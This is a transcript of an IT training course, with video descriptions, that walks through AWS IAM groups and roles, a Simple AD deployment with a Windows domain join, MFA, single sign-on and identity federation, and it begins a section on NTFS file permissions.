AmazonS3ReadOnlyAccess and Show Policy | Detach Policy | Simulate Policy links. [Video description ends]
Now if we go back and check the user that's in that group. That would be user NParks. Notice that Permissions
now shows AmazonS3ReadOnlyAccess by virtue of being in the East_Admins_Group.
[Video description begins] He opens the Users blade in which the Users and Groups table is displayed. Then
he clicks theNParks row entry under the User name column header and its corresponding blade opens in
which the Permissions tab is displayed. It includes the table with two columns and a row. The column headers
are Policy name and Policy type. Their row entries are AmazonS3ReadOnlyAccess and AWS managed policy
from group East_Admins_Group. [Video description ends]
So what we're going to do is we're going to sign in as this user to make sure that there is indeed read only
access to S3 storage, S3 buckets. So we're going to need to go to the Security credentials tab here because
there's the sign-in link that that user would sign in with. We know the username, NParks. But if we don't know
the password, we can also click Manage here and we can generate a new password.
[Video description begins] He opens the Security credentials tab. He highlights the Console sign-in link which
reads: https://611279832722.signin.aws.amazon.com/console. Then he clicks the Manage link adjacent to the
Console password text. The Manage console access dialog box opens. [Video description ends]
So for example, I could choose Autogenerated password. Apply, and I could choose Show. So I'm going to go
ahead and highlight and copy that password so I can sign in as user NParks given the URL for sign in.
[Video description begins] The Manage console access dialog box includes an option labeled "Set password".
The Set password option contains three radio buttons labeled "Keep existing password", "Autogenerated
password", and "Custom password". The Keep existing password radio button is selected. He selects the
Autogenerated password radio button. Then he clicks a button labeled "Apply". The New password dialog box
opens with the Console password information, which is hidden, and a Show link. He clicks the Show link and
the password labeled "PPk|L1#k@+2v" displays. He copies the password and closes the New password dialog
box. [Video description ends]
So I'm going to go ahead and sign in as user NParks, I'll put in the password and sign in. And of course at this
point I am now going to be signed in to Amazon Web Services with that user account.
[Video description begins] He opens the AWS sign in page. In the Account ID or alias text box, 611279832722
value auto-populates. He types NParks in the IAM user name text box. Then he pastes the copied password in
the Password text box and clicks the Sign In button. The AWS sign in page closes and AWS Management
Console opens. [Video description ends]
I'm just going to switch over to a region I know where there are S3 cloud storage buckets, North Virginia.
[Video description begins] In the menu bar, he clicks the Ohio drop-down menu and a list of different regions
opens. He selects a region labeled "US East (N. Verginia) us-east-1". [Video description ends]
And in Find Services, I'll search for S3. Now that's going to open up the S3 Management Console. Remember,
this user should have read-only access. So let's just scroll down and here we can see there are a number of
buckets.
[Video description begins] He types S3 in the Find Services search box and the search result includes an S3
link. Then he clicks the S3 link and a window labeled "S3 Management Console" opens. The S3 Management
Console is divided into three parts: menu bar, navigation pane, and content pane. The navigation pane
includes options labeled "Buckets" and "Batch operations". The Buckets option is selected by default and its
corresponding blade is open in the content pane. The blade includes a search box, a button labeled "Create
bucket", and a table with four columns and multiple rows. The column headers are Bucket name, Access,
Region, and Date created. [Video description ends]
And if we start clicking on them to open them up, sure we can see what's there. What about if we try to upload
some contents?
[Video description begins] He clicks a bucketyyy row entry under the Bucket name column header and its
corresponding blade opens. The blade contains five tabs labeled "Overview", "Properties", "Permissions",
"Management", and "Access points". The Overview tab is selected. It includes a button labeled "Upload" and
a table with four columns and two rows. The column headers are Name, Last modified, Size, and Storage
class. [Video description ends]
Well, I have dragged a bunch of files here that I want to upload into the bucket. I'm going to keep going
through and accepting all of the defaults and I'm going to upload.
[Video description begins] He clicks the Upload button and a wizard labeled "Upload" opens in which a page
labeled "Select files" opens. The Select files page contains a button labeled "Add files". He clicks the Add files
button and a list of files displayed which contains four files labeled "CustomerDatabase.accdb",
"LicenseKey.txt", "Project_A.txt", and "Regional_Spending_2016.csv". Then he clicks a button labeled "Next"
and a page labeled "Set permissions" displays. [Video description ends]
However, we can see of course it's failing as it's uploading because all we have is read-only access to S3, we
don't have any write access.
[Video description begins] He clicks the Next button and a page labeled "Set properties" displays. Then he
clicks the Next button and a page labeled "Review" displays. Then he clicks a button labeled "Upload" and the
Upload wizard closes. An Upload status bar displays at the bottom of the content pane. It displays uploading
of all the files is failed. [Video description ends]
Interestingly, if we start going back to the main AWS screen and let's say we go into EC2 to look at virtual
machines, so EC2 > Instances.
[Video description begins] He clicks an icon labeled "aws" in the menu bar and the AWS Management
Console opens. Then he types ec2 in the Find Services search box and the search result includes EC2 link. He
clicks the EC2 link and a web page labeled "EC2 Management Console" opens. It is divided into three parts:
menu bar, navigation pane, and content pane. The navigation pane includes options labeled "EC2 Dashboard"
and "INSTANCES". The INSTANCES option is selected and its corresponding blade is open in the content
pane. The INSTANCES option includes sub options labeled "Instances" and "Instance Types". [Video
description ends]
If we were to start poking around in here. We also would not have access to even read anything. So here I don't
even see that there are virtual machine instances in North Virginia.
[Video description begins] He selects the Instances sub option in the navigation pane and its corresponding
blade opens in the content pane. The blade displays a table with multiple columns and no rows. The column
headers include Name, Instance ID, and Instance Type. An error message displays which reads: An error
occurred fetching instance data: You are not authorized to perform this operation. [Video description ends]
However, when I am signed in with a different user account. In that same geographical region, we can see in
fact there are all kinds of EC2 instances.
[Video description begins] He log-ins with a different user in the EC2 Management Console in which the
Instances blade is open. The Instances blade displays a table with multiple columns and four rows. The
column headers include Name, Instance ID, and Instance Type. [Video description ends]
So working with IAM is going to vary from one system to the next. They're not all exactly the same and the
way that we administer them is always going to be a little bit different. But the underlying principles remain
the same.
In this video, you will create an IAM role in Amazon Web Services.
Objectives
[Video description begins] Topic title: Cloud IAM Role Creation. The presenter is Dan Lachance. [Video
description ends]
One interesting aspect of identity and access management is working with roles.
[Video description begins] The AWS Management Console opens. [Video description ends]
We're talking about roles as opposed to working with user accounts and groups. In essence, what a role does is
it represents a software entity. So an app component that might need access to a resource. Imagine that a
developer has built a component for a front-end web app that needs to fetch data from a back-end database.
And so it needs access, whether be read and write list, whatever the case is, it needs access. So in the past,
what might have been done is creating a dummy user account for that purpose, but these days instead, a role is
used. So a role would be used to assign permissions to a component. So we're going to take a look at how that
works in Amazon Web Services. So here from the console, I'm going to search for IAM, I'll click on the result
to open up the IAM Management Console, where on the left I can see Roles.
[Video description begins] He types iam in the Find Services search box and its search result displays an IAM
link. He clicks the IAM link and the IAM Management Console opens. The navigation pane includes an option
labeled "Dashboard". The Dashboard option is selected and its corresponding blade is open in the content
pane. [Video description ends]
Now there were plenty of built in roles available and depending on what you configure in the AWS Cloud
environment will determine how many of these that you actually will see.
[Video description begins] In the navigation pane, the Access management option includes sub options labeled
"Roles" and "Policies". He selects the Roles sub option and its corresponding blade opens. The blade includes
a button labeled "Create role" and a Role table with three columns and multiple rows. The column headers
are Role name, Trusted entities, and Last activity. [Video description ends]
Now a lot of them are there all of the time, but some are specific to your actions in the cloud environment.
We're going to create a role. So I'm going to click the Create role button.
[Video description begins] A wizard labeled "Create role" opens. Its first step is divided into two sections. The
first section is labeled "Select type of trusted entity". It includes four tiles labeled "AWS service", "Another
AWS account", "Web identity", and "SAML 2.0 federation". The AWS service tile is selected. The second
section is labeled "Choose a use case". It displays a list of use cases which includes EC2 and Lambda. He
selects the Lambda use case. [Video description ends]
Now we can create a role for a specific AWS service that would need access to a resource. As in the example, I
described where a software component on a front-end web app needs access to a back-end database, that
happens all the time. Or it could be Another AWS account that we want to give permissions to, or some kind
of Web identity or SAML 2.0 federation authority. In this case, it's going to be AWS service. Okay, so let's say
that we've got a developer that's created an AWS lmbda function. Lambda is a way to create functions that are
hosted in the AWS cloud without having to set up the underlying server to support it. So it allows developers
to build custom functions in the cloud. Okay, so let's say that's what we want to assign permissions to is some
function that needs access. Let's say it needs access to an S3 storage bucket in Amazon Web Services, maybe
to list files. So I'm going to go ahead and click on Lambda. Now, now that we've got that, I'm going to click
Next: Permissions in the bottom-right. So what permissions does our AWS lambda custom function require?
[Video description begins] The next step displays which is labeled "Attach permissions policies". It includes a
button labeled "Create policy", a search box labeled "Filter policies", and a table with two columns and
multiple rows. The column headers are Policy name and Used as. [Video description ends]
Well, we'd have to know what the developer did when they wrote the code for that function. Let's assume that
it needs access to S3. So we can search for S3 policies. Okay, well let's say it needs full access to S3 or maybe
it only needs read-only depending on how the code is written. But let's say in our case it's full S3 access. Okay,
well having done that, I'll click Next: Tags.
[Video description begins] He types s3 in the Filter policies search box and the filtered result displays in the
table. He points to AmazonS3FullAccess and AmazonS3ReadOnlyAccess row entries under the Policy name
column header. Then he selects a checkbox adjacent to the AmazonS3FullAccess row entry. [Video description
ends]
We can also add tagging values here, or metadata. Let's say this is for a project called ABC. Then we can just
flag it that way. So we could easily search for and group and assign costs to project ABC. I'll click Next:
Review.
[Video description begins] He clicks a button labeled "Next: Tags" and the next step displays labeled "Add
tags (optional)". It contains a table with three columns and a row. The column headers are Key, Value
(optional), and Remove. The row entries under the Key and Value (optional) column headers contain an empty
text box. He types Project and ABC in the respective text boxes. A cross sign appears under the Remove
column header. [Video description ends]
Then we have to give this role a name. So let's say this is for WebApp1Comp1S3, maybe that's the name of the
function, well, doesn't have to be the name of the function but that's the name of the role that might mirror the
function and what it needs.
[Video description begins] The next step displays which is labeled as "Review". It includes a text box labeled
"Role name". He types WebApp1Comp1S3 in the Role name text box. [Video description ends]
Okay, so now that we've got all of that done, I'm going to just scroll down. Make sure everything looks good.
That's fine, nothing else we have to change here. I will create the role.
[Video description begins] He clicks a button labeled "Create role". The Create role wizard closes and the
Roles blade displays. [Video description ends]
Now, there a number of ways the role can be used, often what happens is we might have some custom code,
even running in a EC2 instance in Amazon Web Services. That means it's running within a virtual machine.
And so we can assign the role to the virtual machine so that the code running in the virtual machine has those
privileges of the role. Now, how would that work? Well, let's go back to the main AWS page and let's go into
the EC2 Management Console where we can go to the Instances view.
[Video description begins] The Instances blade includes a drop-down menu button labeled "Actions" and a
table with multiple columns and four rows. The column headers include Name, Instance ID, and Instance
Type. [Video description ends]
Let's say we've got a custom chunk of code, doesn't have to be a lambda function, but in our case it is. But
basically, it's assigned to a particular virtual machine here, Linux1, so I'll select it.
[Video description begins] He selects a checkbox adjacent to a Linux1 row entry under the Name column
header. A section adds in the blade which contains four tabs labeled "Description", "Status checks",
"Monitoring", and "Tags". The Description tab is selected. [Video description ends]
What I can do is go to the Actions menu, and we have the ability to modify roles or attach roles for an instance
by going to Instance Settings. And you'll see over here on the right, we can choose to attach or replace an IAM
role.
[Video description begins] He clicks the Actions drop-down menu button and a flyout opens which includes
options labeled "Instance Settings" and "Image". He selects the Instance Settings option and a flyout opens
which includes sub options labeled "Attach/Replace IAM Role". He selects the Attach/Replace IAM Role sub
option and its corresponding blade displays. [Video description ends]
And from this list, we can specify exactly which role that we want to assign here. So it could be any of the
roles that we've got created. So you can do it there, you can also create a new role from here.
[Video description begins] The Attach/Replace IAM Role blade includes a drop-down list box labeled "IAM
role". The AmazonSSMRoleForInstancesQuickSetup is a default role selected in the drop-down list box. He
clicks the drop-down list box and a drop-down list appears which includes role options labeled "No Role" and
"AmazonSSMRoleForInstancesQuickSetup". He points to a link labeled "Create new IAM role". [Video
description ends]
Also, if you're launching a new instance for example, part of what you see, I'll just quickly go through this, as
you're configuring that is you can assign a role as you are creating the instance right here with IAM role.
[Video description begins] He clicks a button labeled "Cancel". The Attach/Replace IAM Role blade closes.
The Instance blade displays. He clicks a drop-down button labeled "Launch instance". A wizard with seven
steps displays. The first step is labeled "Choose AMI". It includes a tab labeled "Quick Start". It includes a list
of AMIs such as Amazon Linux 2 AMI (HVM), SSD Volume Type. Each AMI is linked with a button labeled
"Select". He clicks the Select button adjacent to the Amazon Linux 2 AMI (HVM), SSD Volume Type AMI. The
second step labeled "Choose Instance Type" appears. Then he clicks a button labeled "Next: Configure
Instance". The third step labeled "Configure Instance" appears. He clicks a drop-down list box labeled "IAM
role". The drop-down list includes role options labeled "None" and
"AmazonSSMRoleForInstancesQuickSetup". [Video description ends]
So we've got a number of options available for that. So the role is just another way to assign permissions. So
let's just go back here very quickly into the IAM Management Console.
[Video description begins] He clicks the aws icon in the menu bar and the AWS Management Console
opens. [Video description ends]
[Video description begins] He types iam in the Find Service search box and selects IAM link in the search
result. The IAM Management Console opens. He clicks the Roles sub option in the navigation pane and its
corresponding blade displays in the content pane. [Video description ends]
Again this is where we'll see all of the roles including our custom roles. So if I filter for web, there it is right
there.
[Video description begins] He types web in the search box and the table displays the web associated filtered
result. [Video description ends]
WebApp1Comp1S3. And if I click on it to open it up, we can see the Permissions that the role was assigned, in
this case AmazonS3FullAccess.
[Video description begins] He clicks the WebApp1Comp1S3 row entry under the Role name column header
and its corresponding blade displays. It includes a Permissions tab which includes a table with two columns
and a row. The column headers are Policy name and Policy type. Then he points to the AmazonS3FullAccess
row entry under the Policy name column header. [Video description ends]
In this video, find out how to deploy Simple Active Directory in Amazon Web Services.
Objectives
[Video description begins] Topic title: Cloud Directory Services. The presenter is Dan Lachance. [Video
description ends]
Now this is essentially similar to what we would get as a result if we installed and configured Microsoft Active
Directory Domain Services on-premises. The difference is that with just a few clicks, we can get this running
in the cloud. Whether it's running on true underlying Windows servers. Or Linux hosts running Samba to
emulate Windows functionality, including Domain Services. So here in Amazon Web Services, I'm going to
start in the console by searching for the word directory, and then I'll choose Directory Service. If I have any
existing directory stores here, they'll be shown in the list, but we don't have any yet.
[Video description begins] He types direct in the Find Services search box and the search result includes a
link labeled "Directory Service". Then he clicks the Directory Service link and its corresponding web page
opens. It is divided into three parts: menu bar, navigation pane, and content pane. The navigation pane
contains two options labeled "Active Directory" and "Cloud Directory". The Active Directory contains two sub
options labeled "Directories" and "Directories shared with me". The Directories sub option is selected and its
corresponding blade is open in the content pane. The blade includes a button labeled "Set up directory" and a
table with multiple columns and no rows. The column headers include Directory ID, Directory name, and
Type. [Video description ends]
So I'm going to click the Set up directory button over on the right. And we've got a number of options.
[Video description begins] A wizard labeled "Set up a directory" opens in which the first step labeled "Select
directory type" is displayed. [Video description ends]
If you want true Microsoft Active Directory, then you can use AWS Managed Microsoft AD. But I just need
simple AD, so it's powered by Linux-Samba, that's perfect for what I need to do. I don't need a lot of users and
a lot of additional capabilities. So I'm going to go with that, I'm going to click Next. I only have a small
number of users, so I'll choose a small directory size.
[Video description begins] He selects a radio button labeled "Simple AD". Then he clicks a button labeled
"Next". The second step labeled "Enter directory information" displays. It includes two tiles labeled "Small"
and "Large". [Video description ends]
And then I'll fill in some details such as the Directory DNS name. So I filled in the DNS name for my domain
as well as the NetBIOS name, and I've specified and confirmed an administrator password. I'm going to go
ahead and click Next.
[Video description begins] He selects a radio button in the Small tile and then text boxes labeled "Directory
DNS name" and "Directory NetBIOS name - Optional" populates with quick24x7.local and quick24x7 values
respectively. He sets the password in the text boxes labeled "Administrator password" and "Confirm
Password". [Video description ends]
I can also determine the VPC that this will be available in. So that means that I can have for example, virtual
machines in the same cloud network location, that can be joined to this domain. So I'm going to choose
VPC1_Subnet1 and VPC1_ Subnet2.
[Video description begins] The third step labeled "Choose "VPC and subnets" displays. It includes drop-down
list boxes labeled "VPC" and "Subnets". [Video description ends]
And I'm going to click Next. And on the summary screen, that's about it. That's all I want to do. So I'm going
to go ahead and click Create directory. Now this might take a few minutes. We can see here that the Status is
listed as Creating.
[Video description begins] The fourth step labeled "Review & Create" displays. [Video description ends]
So I can periodically click the Refresh button until such time that my cloud deployment of the Samba-based
Active Directory is ready to go.
[Video description begins] The Directories blade displays. It includes a table with multiple columns and a
row. The column headers include Directory ID, Type, Size, and Status. He points to a Creating row entry
under the Status column header. Then he clicks a button labeled "Refresh". The status remains the
same. [Video description ends]
And before too long, the Status will switch to Active. So if we click on the link for our Directory ID, that'll
open it up. And we'll see that we've got our Simple Active Directory that is still in the midst of being created.
It's not quite finished up here, but we can still click on the Refresh button. When we see that it's Active, we'll
also see that it's got DNS server IP addresses. Any machines that you want to join to an Active Directory
domain need to be able to locate domain server DNS records.
[Video description begins] He clicks a d-906771189a row entry under the Directory ID column header and its
corresponding blade opens. It includes detailed information about the Directory which includes Directory
type: Simple AD and Status: Creating. He clicks the Refresh button and the status changes to Active. The
directory information also includes DNS address: 172.31.92.197 and 172.31.8.187. He highlights the DNS
addresses. [Video description ends]
Specifically service location records. And so these IP addresses are what your machines need to be pointing to
for DNS servers before they can join the domain.
Joining Windows computers to an Active Directory domain is beneficial. Because we have centralized
configuration management capabilities as a result of doing that. It also allows users to sign in to any domain-
joined computer using their centralized Active Directory domain credentials.
[Video description begins] The AWS Management Console opens. [Video description ends]
Here in the AWS cloud, in the console, if I search for directory and then if I choose Directory Service. I'll see
that I've got an instance of Active Directory, specifically Simple Active Directory, which means it's really
running on Linux. And the domain name is quick24x7.local.
[Video description begins] He types directory in the Find Services search box. Its search result includes the
Directory Service link. He clicks the Directory Service link and its corresponding web page opens. The
Directories sub option is selected in the navigation pane and its corresponding blade is open in the content
pane. [Video description ends]
And if I click on the link to open it up, I can see the DNS server IP addresses.
[Video description begins] He clicks the d-906771189a row entry under the Directory ID column header and
its corresponding blade opens. He highlights the DNS address: 172.31.92.197 and 172.31.8.187. [Video
description ends]
Which is important when you want to join a computer to this domain. So back here at the main page of the
AWS Management Console. I've got a couple of EC2 instances or virtual machines. They are running
Windows Server 2019 and they're both listed here as running. So they have an Instance State of running.
[Video description begins] He switches to the AWS Management Console. Then he clicks a link labeled "EC2"
displayed in a section labeled "All services". The EC2 Management Console opens. He clicks the Instances
sub option in the navigation pane and its corresponding blade opens in the content pane. The blade includes
the table with multiple columns and four rows. The column headers include Name and Instance State. He
points to WinSrv2019-2 and WinSrv2019-1 row entries under the Name column header and their respective
Instance State is running. [Video description ends]
So what I'm going to do is I'm going to go and remote desktop into the first server here because I want to join it
to the domain.
[Video description begins] He selects a checkbox adjacent to the WinSrv2019-1 row entry. [Video description
ends]
So I've got that machine selected here. When I click Connect, it will allow me to download a remote desktop
file. And I can also click Get Password to decrypt the administrator password.
[Video description begins] He clicks a button labeled "Connect". A dialog box labeled "Connect to your
instance" opens. It includes buttons labeled "Download Remote Desktop File" and "Get Password". He clicks
the Get Password button. A button labeled "Choose File" and a text field displays. Then he highlights a text
labeled "Key Pair Path" adjacent to the Choose File button. [Video description ends]
I have to choose my private key file which would have been created previously and downloaded and stored
safely on my machine. Once I've specified that key and decrypted the password, I can see the remote desktop
password here. So I'm just going to go ahead and download the remote desktop file so we can get into that
machine and join it to the domain. So I've downloaded the RDP file.
[Video description begins] He clicks a button labeled "Back" and the Download Remote Desktop File button
and Public DNS, User name, and Password information displays. He copies the encrypted Password. [Video
description ends]
I'm going to go ahead and click on it. And tell it not to ask me to trust this computer in the future. And I'll just
paste in the decrypted admin password here. And I'm going to RDP into this machine. It's no different than
RDPing into an on-premises Windows server.
[Video description begins] He clicks the Download Remote Desktop File button and its file downloads and
displays at the bottom of the browser. Then he opens the downloaded file and a dialog box labeled "Remote
Desktop Connection" opens. He selects a checkbox labeled "Don't ask me again for connection to this
computer". Then he clicks a button labeled "Connect" and the dialog box closes. A dialog box with a progress
bar displays to show configuring remote network status. A dialog box labeled "Windows Security" opens. He
pastes the decrypted password in a text box labeled "Administrator". Then he clicks a button labeled "OK"
and the Windows Security dialog box closes. A dialog box with a progress bar displays to show configuring
remote network status. The Remote Desktop Connection dialog box opens. He selects a check box labeled
"Don't ask me again for connection to this computer". Then he clicks a button labeled "Yes" and the Remote
Desktop Connection dialog box closes. A dialog box with a progress bar displays to show configuring remote
network status. [Video description ends]
Only difference is this one's running on someone else's equipment in the public cloud. Now what I want to do
is make sure that I point this computer to the DNS server IP addresses that we looked at when we initially
started this.
[Video description begins] The dialog box with a progress bar closes. A remote desktop window
displays. [Video description ends]
So here in my Windows host, I'm just going to go into the Start menu and let's say into the Control Panel. So
we can configure our network adapter settings. So I'll click Network and Internet, Network and Sharing
Center, and in here, I'm going to click Change adapter settings.
[Video description begins] The Control Panel window opens. [Video description ends]
[Video description begins] A folder labeled "Network Connections" opens. It includes a network adapter
labeled "Ethernet". [Video description ends]
So I'll right-click on it and go into the Properties of it. And I'm interested in Internet Protocol Version 4. I'll
double-click there.
[Video description begins] A dialog box labeled "Ethernet Properties" opens. He double-clicks a setting
labeled "Internet Protocol Version 4 (TCP/IPV4)" and its corresponding dialog box opens. [Video description
ends]
And here's where I want to change the DNS server information. So I want to specify the DNS servers that the
DNS server addresses. There are two of them that we saw when we initially looked at our cloud-based Active
Directory deployment.
[Video description begins] He highlights 127 in the DNS server address mentioned in a text box labeled
"Preferred DNS server". [Video description ends]
So once I've done that, I'm going to go ahead and click OK and all that stuff is great.
[Video description begins] The Preferred DNS server text box populates with 172.31.92.197 DNS server and a
text box labeled "Alternate DNS server" populates with 172.31.0.187 DNS server. Then he closes the Internet
Protocol Version 4 (TCP/IPv4) Properties dialog box and then the Ethernet Properties dialog box
closes. [Video description ends]
From the Start menu on my server, I'm now going to click on Control Panel, where I'm going to go into System
and Security. And then System where I can see the current computer name and the fact that it's in a work group
called WORKGROUP. Change settings and I'm going to click the Change button.
[Video description begins] The Control Panel window opens. He clicks a link labeled "System" and the basic
information about computer displays which includes Computer name, domain, and workgroup settings, and a
link labeled "Change settings". [Video description ends]
So I'm going to specify a new computer name and I'm going to specify the name of the Active Directory
domain I want to join this machine to. In this case quick24x7.local, and I'll click OK.
[Video description begins] He clicks the Change settings link and a dialog box labeled "System Properties"
opens which includes a button labeled "Change". He clicks the Change button and a dialog box labeled
"Computer Name/Domain Changes" opens. It includes a text box labeled "Computer name" with WinSrv2019-
2 value. It also includes a radio button labeled "Domain" and a text box linked to it. The text box contains
quick24x7.local value. [Video description ends]
And I'll then specify the credentials for the Active Directory domain. Which would have been specified when
that was deployed in the cloud and I'll click OK. Then we should get a message that says, welcome to the
domain, and we did, perfect.
[Video description begins] A dialog box labeled "Windows Security" opens. It includes two text boxes. The
first text box contains administrator value and the second text box contains a hidden password. [Video
description ends]
So I'm just going to click OK to get all the way back out and when it prompts you to restart, I will click Restart
Now. So now that I've rebooted, I've signed in with the domain administrator account. So if I were to go to the
command line, and let's just enlarge that a little bit. We can verify exactly who we are logged in as with the
whoami command.
[Video description begins] He opens the Administrator: Command Prompt window. The C:\Users\
Administrator.QUICK24X7> prompt is displayed. [Video description ends]
First, let's enlarge what we're looking at. So once we've done this, we can tell of course based on the path it put
us in who we're logged in as. But let's just verify it with the whoami command. Indeed, we are the
administrator in the quick24x7 domain. And if we were to go into our Control Panel just to triple check.
[Video description begins] He executes the whoami command. The output reads: quick24x7\administrator.
The prompt remains the same. [Video description ends]
Go into System and Security and then System, we'll see that indeed the machine is joined to the
quick24x7.local Active Directory domain. So at this point it's business as usual. We would install the tools that
we would normally use to manage users and groups in Active Directory and everything would be the same.
After completing this video, you will be able to recognize how MFA enhances sign-in security.
Objectives
[Video description begins] Topic title: Multifactor Authentication. The presenter is Dan Lachance. [Video
description ends]
An important aspect of user's sign in security is multi-factor authentication, otherwise called MFA. And if
you're on the internet doing pretty much anything these days you probably have experience with it. Such as in
addition to signing in with a username and password, maybe needing to have your smartphone nearby because
you're being texted an SMS code that you have to enter in addition to having knowledge of a username and
password before you can authenticate to a system. And that's what this is about. So it requires additional
authentication factors. For example, beyond the standard username and password. It can also use out-of-band
mechanisms to send authentication codes. Out-of-band would mean some other transmission mechanism
beyond what you're already using to try to sign in. So imagine that you're using a web browser to try to sign
into some site like eBay or PayPal. Well, you'll need a username and password for that, but it might also
require you to have a phone nearby so that it texts you a pin, a code, that you must also enter. And because it
might be doing that through text messaging, that's a different transmission mechanism than over the Internet,
straight over the Internet as your web browser session is, so it's out of band. So multi-factor authentication is
by far more secure than just username and password. Username and password really constitute knowledge and
nothing more. And that knowledge could potentially be acquired by malicious users, thousands of miles away.
But requiring a smart phone, that's a bit of a different story, or a smart card, that makes it a little more difficult
to break into. Not that it's impossible, but it's more difficult. Multi-factor authentication then combines two or
more authentication categories. So maybe something you know, like a name and a password, and something
you have, like a smart card or a phone that has a six-digit pin that you must enter. It could also be something
you know plus something you are. Something you are is biometric authentication, it could be your fingerprint
scan or an eye retinal scan or something along those lines. Multi-factor authentication might also be something
you have plus something you do. So something you have might be some kind of a hardware token to
authenticate to a VPN. Something you do might be a specific gesture-based authentication mechanism. In
IAM, identity and access management, we can enable MFA for users.
[Video description begins] IAM User MFA Enablement. [Video description ends]
Now how that's done specifically depends on your specific IAM solution. Generally speaking, you will select
the IAM user for whom you wish to enable IAM. You will then assign an MFA device, whether it's a physical
device like a key fob, with a little screen with the code that changes. Or maybe it's a virtual MFA device. It's
an app on a phone, an authenticator app. The next thing that might happen, again it will vary, depending on the
system you're using, is that you might have to insert a USB device, or enter a device PIN, or scan a QR code.
This is all part of setting up or enabling MFA. So if I were to assign, for example, a virtual MFA device to a
user, then the user just needs an authenticator app, like Microsoft authenticator or Google Authenticator,
something like that on their device, on their smartphone. And so I could scan a QR code that would be used to
add an count on that device. Now when I say add an account, it would add a reference to the IAM user account
where MFA is being enabled. And then finally, we would enter the MFA codes that are still part of the setup of
MFA to initialize MFA for that account. Usually it'll be a collection of two unique pins. Now, systems are
different, but generally speaking, you'll be presented with a six-digit PIN that's good for 30 seconds. Now,
after that, you enter that in, you wait 30 seconds, you enter the second one in. That's why it says enter MFA
codes, after which MFA will have been successfully enabled for the selected user account. And when they sign
in in the future, they're going to need to know a username and a password and they'll have to enter a PIN, a six-
digit PIN for example.
[Video description begins] Topic title: Enabling MFA. The presenter is Dan Lachance. [Video description
ends]
What normally goes hand in hand with identity federation is single sign-on or SSO.
SSO provides automatic user sign-on to apps, now that's provided that they've already authenticated once. Now
you can do this in many different ways. For example, if you're using the Microsoft Azure cloud, you can use
Azure Active Directory Seamless SSO. But you can also enable SSO in many other solutions including on-
premises solutions, like Active Directory Federation Services.
[Video description begins] The full form of AD is Active Directory. [Video description ends]
Now, using a solution in the cloud like Azure Active Directory Seamless SSO would mean you'd have to
configure something called Azure AD Connect. Azure AD Connect is a link between your on-premises active
directory infrastructure and your Azure cloud-based Active Directory infrastructure.
Single sign-on methods include those for cloud applications as well as those that might be used for on-
premises apps. It's not just about cloud-based authorization to use something. And there is some roll over
between the two, where a single solution could be used for either cloud or on premises app SSO. OpenID
Connect is a standard that's used for authenticating.
And also OAuth is an authorization protocol that's used for the purpose, most commonly of SSO, single sign-
on. The Security Assertion Markup Language or SAML single sign-on is yet another mechanism for SSO for
cloud apps. And password-based sign-on, what this means is that users would sign-on to the app with a
username and password for the first time, only the first time that they use that app. And after that, the identity
solution can remember those credentials, which essentially gives the impression of single sign-on, I guess it
kind of is. Then there's an option for linked type of SSO for a cloud application. What this means is that if
we've got another type of authentication provider configured, let's say Office 365, we want to allow those
authenticated connections to pass through to, let's say, something in the Microsoft Azure cloud. So it's linked.
On-premises, well, here's some similarities we've already talked about for cloud-based SSO. SAML, password-
based, linked and then there's Integrated Windows Authentication on the windows side of things. With
Integrated Windows Authentication, if you've already signed in successfully to a Windows host, let's say with
your Active Directory username and password, then you're automatically trusted to access other apps. If those
other apps support Integrated Windows Authentication which is often called IWA, I-W-A. You've also got
another type of SSO that's called header-based authentication. This is really for web apps that examine HTTP
headers for authentication-based information that can determine whether a user needs to sign in again or
whether they've already signed in and already have specified their credentials. In which case, SSO should
allow them to connect automatically.
After completing this video, you will be able to recognize the role of identity federation across organizations,
including SSO.
Objectives
Identity federation, generally speaking, means using one trusted identity provider to provide the authentication
mechanism for a completely different app or a web site. So this means using a trusted identity provider,
otherwise called an IdP. An identity provider is where the user account information is stored and where
authentication actually takes place. Examples of IdPs include Microsoft Active Directory, whether on-premises
or in the cloud, or Facebook, or Google. All of those can serve as identity providers to allow access to
something completely outside of their own realms. Now the resource provider, or the RP, is the other
application or the other web site. For example, you might have a web site that allows you to authenticate using
your Google or Facebook credentials. So Google or Facebook in that case are the IdP, the site you're trying to
use that to get access to is the RP, the resource provider. So these are essentially web apps that trust the
identity provider. Then there's the notion of claims. A claim is assertion about a user or a device. And that
assertion has details about the user of the device such as the user date of birth, or the type of device a user is
using to authenticate, or the subnet from which that user is authenticating. Depending on the web app that the
user is trying to gain access to, it might require very specific claim details to be present when a user tries to
access that resource.
[Video description begins] Identity Federation and Claims. [Video description ends]
So pictured on the screen, here we have a user that's trying to access an app in the center. Now what happens
after the user tries to access the app is that the app will redirect the user to the identity provider for
authentication. Now over on the bottom-left here, the user will authenticate successfully. Under ideal
circumstances, the server will digitally sign a token. Now the token is an authentication item that says this user
is authenticated, and that token can contain one or more claims. Now what's a claim? Well, we see in the
bottom-right, a claim is considered to be a form of attribute-based access control. So the user's date of birth,
their manager, the city they're in, the type of device they're logging in with, all of that and many other possible
things constitute claims. So the claim information is written into the token. The token is digitally signed by the
server. So now what happens, and we see this at the top-center of our diagram, is the user is then authorized to
use the app they tried to sign in to in the first place. Now, all of this happens in the background. The user
doesn't see it happening, it's automatic. So all the user knows is they're trying to access an app, they enter in
their credentials, and then they're in the app. But in the background, that app did not do the authenticating.
Now last thing you want to do in a busy enterprise is configure each and every app with its own authentication.
Instead, it's easier to have it defer that task to the identity provider and then trust the digitally-signed tokens
from the identity provider.
In this video, you will set permissions on a Windows NTFS file system.
Objectives
set permissions to a Windows NTFS file system
[Video description begins] Topic title: Window File System Permissions. The presenter is Dan
Lachance. [Video description ends]
Permissions can be set on a Windows machine using the GUI or using command line tools, whether at the
standard Windows command line or using PowerShell cmdlets. Here in this example, I'm looking at drive D on
my Windows host in a folder called SampleFiles where there are a number of files. And certainly at the GUI
level, we could right-click on, for example, a single file or multiple files or a folder, we can go into the
Properties and we can go into the Security tab to modify the NTFS file system permissions.
[Video description begins] He right-clicks a file labeled "CustomerDatabase.accdb". A flyout opens which
includes options labeled "Rename" and "Properties". He selects the Properties option and a dialog box
labeled "CustomerDatabase.accdb Properties" opens. It contains four tabs labeled "General", "Security",
"Details", and "Previous Versions". The General tab is selected. [Video description ends]
So these are permissions that apply both over the network when accessing these files if that's available. And
also it applies when accessing the files logged in locally on the host. So we can see users and groups, we can
edit, we can see the permissions, and all of that. But we can also do this from the command line, which we're
going to do.
[Video description begins] He closes the CustomerDatabase.accdb Properties dialog box. [Video description
ends]
